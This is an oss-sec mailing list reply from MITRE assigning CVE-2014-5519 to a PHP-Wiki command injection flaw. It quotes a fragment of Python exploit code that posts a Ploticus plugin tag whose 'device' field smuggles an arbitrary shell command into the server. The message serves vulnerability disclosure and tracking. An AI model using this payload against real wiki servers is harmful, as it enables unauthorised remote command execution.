oss-sec mailing list archives
Re: PHP-Wiki Command Injection
From: cve-assign () mitre org
Date: Fri, 29 Aug 2014 05:08:18 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
data = urllib.urlencode([('pagename','HeIp'),('edit[content]', '<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'), ('edit[preview]','Preview'),('action','edit')]) cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
Use CVE-2014-5519. - -- CVE assignment team, MITRE CVE Numbering Authority M/S M300 202 Burlington Road, Bedford, MA 01730 USA [ PGP key available through http://cve.mitre.org/cve/request_id.html ] -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.14 (SunOS) iQEcBAEBAgAGBQJUAEHwAAoJEKllVAevmvmsETYH/RAUb7JXuixfCbDFM7/ZgRrr 1P92G3AWIkp91RDWOQuDMy4EFqWVDiRL0Ti2SPr/77YVHjpgens8F08Y91CD5fz1 wXkNZSAyIZ1l8SVpbEYgu3ZIy/tNSTKYWmiF4u7udtWazLWdBg0hY+ukZsGzeWJJ KSCnFrFlxeJbgx2MRXE2QnDoQTeDkpZ/1y6lA5M2mpu+kKgAgM53WyfQD9ZeeOTx 8NGdEYTPtYwtzgWSqtkvuon+P1W8mTYp8e623m2PpUolsZQ0CQ/oLcX0Cbtya6y9 4AGxiA6z7l4624et7ltQDih/pGMDl33c0h/896ddZqS/M4pDDvI+EW/px1yKnaI= =TuwP -----END PGP SIGNATURE-----
Current thread:
- PHP-Wiki Command Injection Benjamin Harris (Aug 27)
- Re: PHP-Wiki Command Injection cve-assign (Aug 29)